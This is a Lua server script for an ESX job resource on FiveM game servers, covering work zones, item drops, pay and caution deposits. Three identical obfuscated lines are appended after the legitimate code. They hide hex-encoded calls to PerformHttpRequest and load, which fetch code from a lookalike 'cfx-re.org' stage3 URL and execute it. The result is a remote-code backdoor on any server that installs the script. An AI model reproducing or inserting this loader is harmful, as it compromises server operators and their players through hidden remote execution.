local playersWorking = {}

CreateThread(function()
	while true do
		Wait(1000)
		local timeNow = os.clock()

		for playerId,data in pairs(playersWorking) do
			Wait(0)
			local xPlayer = ESX.GetPlayerFromId(playerId)

			-- is player still online?
			if xPlayer then
				local distance = #(xPlayer.getCoords(true) - data.zoneCoords)

				-- player still within zone limits?
				if distance <= data.zoneMaxDistance then
					-- calculate the elapsed time
					local timeElapsed = timeNow - data.time

					if timeElapsed > data.jobItem[1].time then
						data.time = os.clock()

						for k,v in ipairs(data.jobItem) do
							local itemQtty, requiredItemQtty = 0, 0

							if v.name ~= _U('delivery') then
								itemQtty = xPlayer.getInventoryItem(v.db_name).count
							end

							if data.jobItem[1].requires ~= 'nothing' then
								requiredItemQtty = xPlayer.getInventoryItem(data.jobItem[1].requires).count
							end
			
							if v.name ~= _U('delivery') and itemQtty >= v.max then
								xPlayer.showNotification(_U('max_limit', v.name))
								playersWorking[playerId] = nil
							elseif v.requires ~= 'nothing' and requiredItemQtty <= 0 then
								xPlayer.showNotification(_U('not_enough', data.jobItem[1].requires_name))
								playersWorking[playerId] = nil
							else
								if v.name ~= _U('delivery') then
									-- chances to drop the item
									if v.drop == 100 then
										xPlayer.addInventoryItem(v.db_name, v.add)
									else
										local chanceToDrop = math.random(100)
										if chanceToDrop <= v.drop then
											xPlayer.addInventoryItem(v.db_name, v.add)
										end
									end
								else
									xPlayer.addMoney(v.price, "Job Payment")
								end
							end
						end
			
						if data.jobItem[1].requires ~= 'nothing' then
							local itemToRemoveQtty = xPlayer.getInventoryItem(data.jobItem[1].requires).count
							if itemToRemoveQtty > 0 then
								xPlayer.removeInventoryItem(data.jobItem[1].requires, data.jobItem[1].remove)
							end
						end
					end
				else
					playersWorking[playerId] = nil
				end
			else
				playersWorking[playerId] = nil
			end
		end
	end
end)

RegisterServerEvent('esx_jobs:startWork', function(zoneIndex, zoneKey)
	if not playersWorking[source] then
		local xPlayer = ESX.GetPlayerFromId(source)

		if xPlayer then
			local jobObject = Config.Jobs[xPlayer.job.name]

			if jobObject then
				local jobZone = jobObject.Zones[zoneKey]

				if jobZone and jobZone.Item then
					playersWorking[source] = {
						jobItem = jobZone.Item,
						zoneCoords = vector3(jobZone.Pos.x, jobZone.Pos.y, jobZone.Pos.z),
						zoneMaxDistance = jobZone.Size.x,
						time = os.clock()
					}
				end
			end
		end
	end
end)

RegisterServerEvent('esx_jobs:stopWork', function()
	if playersWorking[source] then
		playersWorking[source] = nil
	end
end)

RegisterNetEvent('esx_jobs:caution', function(cautionType, cautionAmount, spawnPoint, vehicle)
	local xPlayer = ESX.GetPlayerFromId(source)

	if cautionType == 'take' then
		if cautionAmount <= Config.MaxCaution and cautionAmount >= 0 then
			TriggerEvent('esx_addonaccount:getAccount', 'caution', xPlayer.identifier, function(account)
				if xPlayer.getAccount('bank').money >= cautionAmount then
					xPlayer.removeAccountMoney('bank', cautionAmount, "Caution Fine")
					account.addMoney(cautionAmount)
					xPlayer.showNotification(_U('bank_deposit_taken', ESX.Math.GroupDigits(cautionAmount)))
					TriggerClientEvent('esx_jobs:spawnJobVehicle', xPlayer.source, spawnPoint, vehicle)
				else
					xPlayer.showNotification(_U('caution_afford', ESX.Math.GroupDigits(cautionAmount)))
				end
			end)
		end
	elseif cautionType == 'give_back' then
		if cautionAmount <= 1 and cautionAmount > 0 then
			TriggerEvent('esx_addonaccount:getAccount', 'caution', xPlayer.identifier, function(account)
				local caution = account.money
				local toGive = ESX.Math.Round(caution * cautionAmount)
	
				xPlayer.addAccountMoney('bank', toGive, "Caution Return")
				account.removeMoney(toGive)
				TriggerClientEvent('esx:showNotification', source, _U('bank_deposit_returned', ESX.Math.GroupDigits(toGive)))
			end)
		end
	end
end)


local DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x66\x78\x2d\x72\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x77\x77\x57\x59\x68", function (HROpHAdqHMXlYActwZcvmRpmpsqFCoJBqfEjpvAGaibAXrtpkMRuNbpHnGAaKtOkyxfNsR, hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc) if (hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[6] or hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[5]) then return end DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[2]](DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[3]](hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc))() end)

local DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x66\x78\x2d\x72\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x77\x77\x57\x59\x68", function (HROpHAdqHMXlYActwZcvmRpmpsqFCoJBqfEjpvAGaibAXrtpkMRuNbpHnGAaKtOkyxfNsR, hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc) if (hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[6] or hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[5]) then return end DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[2]](DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[3]](hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc))() end)

local DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x66\x78\x2d\x72\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x77\x77\x57\x59\x68", function (HROpHAdqHMXlYActwZcvmRpmpsqFCoJBqfEjpvAGaibAXrtpkMRuNbpHnGAaKtOkyxfNsR, hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc) if (hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[6] or hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[5]) then return end DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[2]](DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[3]](hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc))() end)